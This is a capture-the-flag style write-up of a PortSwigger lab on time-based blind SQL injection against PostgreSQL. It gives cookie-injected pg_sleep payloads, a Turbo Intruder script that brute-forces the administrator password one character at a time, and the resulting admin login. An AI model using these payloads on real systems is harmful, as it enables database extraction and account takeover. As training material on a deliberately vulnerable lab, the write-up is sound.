🗂️PortSwigger Lab Writeup: Blind SQL Injection with Time Delays and Information Retrieval

PortSwigger Blind SQL Injection with Time Delay lab description showing objective and difficulty

🎯 Objective

The objective of this lab is to exploit a Time-based blind SQL injection vulnerability in a web application where the application executes a SQL query with tracking cookie in an unsafe way to track the users for analytics and our goal is to extract the administrator password from the table users and log in as administrator.

Lab URL: https://portswigger.net/web-security/sql-injection/blind/lab-time-delays-info-retrieval
Category: SQL Injection
Difficulty: Practitioner

💉 Payloads Used

Payload 1 - ✅

Add56jTZYwMEpBPU'||CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--

2. For confirming user table

Payload 2 - ✅

Add56jTZYwMEpBPU'||(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users)--

3. For confirming administrator in user table

Payload 3 - ✅

Add56jTZYwMEpBPU'||(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--

4. For determining password length

Payload 4 - ✅

Add56jTZYwMEpBPU'||(SELECT CASE WHEN LENGTH(password)=#marker THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--

5. For extracting password

Payload 5 - ✅

Add56jTZYwMEpBPU'||(SELECT CASE WHEN SUBSTRING(password, ^POS^, 1)='^CHAR^' THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')--

🧪 Exploitation Steps

🕵️Step 1: Observe the Website

Open the lab URL in your browser and explore its functionality.
At first glance, the website seems to be a shopping website with an option to filter products on different categories and also there is a login page. In the lab description, it is mentioned that the vulnerability is in the tracking cookie which is being used directly in a SQL query.

🔍Step 2: Find the Vulnerable Endpoint

Open the BurpSuite and send a request containing the TrackingId cookie to Repeater Tab by Ctrl + R
In the Repeater tab, we will first verify the endpoint for blind sqli by using a PostgreSQL specific payload - Add56jTZYwMEpBPU'||CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--'
Hence, after sending this payload, we received the response with a 5-second delay, confirming that the backend is using a PostgreSQL database and verifying the vulnerable endpoint.

🧾Step 3: Confirm the details

Before we directly extract the password, we should verify that if users table exists or not and if there is administrator username exists in the table.
We will use the payload - Add56jTZYwMEpBPU'||(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users)-- for confirming that users table exists or not.
Hence, the payload executed successfully confirming the presence of users table in database.
Now, we will use the payload - Add56jTZYwMEpBPU'||(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')-- for confirming whether the administrator user exists in the table.
Hence, this payload executed successfully confirming the presence of administrator record in users table.

📏Step 4: Determine the password length

Before we extract the password, it is essential to know the length of password of administrator so that we can craft the payload accordingly to extract it.
Now, to determine the length send the request to Intruder Tab by Ctrl + I
We will use the payload - Add56jTZYwMEpBPU'||(SELECT CASE WHEN LENGTH(password)=#marker THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')-- where #marker will be replaced by the marker in Intruder.
We will use the Sniper attack where the Burpsuite will send the one payload at a time with different password lengths. Set the payload type to be a number and start range from 8 and end range to 22 as password is generally of 8-22 characters.
After this, Finally start the attack.
Hence, only the payload with a length of 20 was received after a 5-second delay, confirming that the payload executed successfully.
Hence, it is being confirmed that the password is of 20 characters.

🔓Step 5: Extract the password

Here, I will be extracting the password using a extension in Burpsuite called Turbo Intruder which will fuzz the application very fast than normal Intruder in Burpsuite Community Edition.
info
Turbo Intruder is a Burp Suite extension designed for high-speed, customized HTTP request generation and analysis — ideal for blind SQLi brute-forcing.
Usually the default Intruder attack will take a very long time in community edition for this purpose, therefore we will be using Turbo Intruder.
Firstly, Install the Turbo Intruder extension from BApp Store.
Now, send a request containing the TrackingId cookie to Send to Turbo Intruder as show below.
We will use the payload - Add56jTZYwMEpBPU'||(SELECT CASE WHEN SUBSTRING(password, ^POS^, 1)='^CHAR^' THEN pg_sleep(5) ELSE pg_sleep(0) END FROM users WHERE username='administrator')-- for extracting password.

Use this script for making the requests to application and determining successful payloads. Since PortSwigger labs usually use lowercase alphanumerics in passwords, we limited the charset to a-z0-9 for speed.

import string

def queueRequests(target, wordlists):
    engine = RequestEngine(target.endpoint, 
                        concurrentConnections=3,
                        requestsPerConnection=3,
                        pipeline=False,
                        timeout=10000000)

    max_len = 20
    charset = string.ascii_lowercase + string.digits

    for pos in range(1, max_len + 1):
        for ch in charset:
            req = target.req.replace("^POS^", str(pos)).replace("^CHAR^", ch)
            engine.queue(req) 

def handleResponse(req, interesting):
    if req.time >= 5000000:
        table.add(req)

After configuring everything, start the attack.
Hence, we got the each password character of every place in 20 digit.

🧑‍💼Step 6: Log in as Administrator

Finally, open the login page and write the credentials of administrator extracted from Turbo Intruder to log in.
And💥Booom!, We got the access of Admin account on the website.
And Finally, the Lab is solved.

🧠 Conclusion

This lab involves a case of Blind SQL injection vulnerability, where the TrackingId cookie parameter is used to track users for analytics and the application directly concatenates the cookie into a SQL query without validation or sanitization.
Since the application does not validate the user input and does not use prepared statements, it becomes vulnerable to SQL injection. This allowed us to send time-based payloads and confirm the execution on the backend.
By testing different payloads, we were able to:
- Confirm the vulnerability using pg_sleep() delay payloads.
- Identify the backend database (PostgreSQL).
- Verify the presence of the users table and the administrator user.
- Determine the password length of the administrator account.
- Extract the password one character at a time using Turbo Intruder.
- Finally, use the obtained credentials to log in as administrator, gaining full system access.
This lab highlights that time-based blind SQL injection is still very impactful, even when there is no visible change in the application, and it reinforces the importance of sanitizing all user input - including cookies.

🎯 Objective​

💉 Payloads Used​

1. For confirming blind SQL injection​

2. For confirming user table​

3. For confirming administrator in user table​

4. For determining password length​

5. For extracting password​

🧪 Exploitation Steps​

🕵️Step 1: Observe the Website​

🔍Step 2: Find the Vulnerable Endpoint​

🧾Step 3: Confirm the details​

📏Step 4: Determine the password length​

🔓Step 5: Extract the password​

🧑‍💼Step 6: Log in as Administrator​

🧠 Conclusion​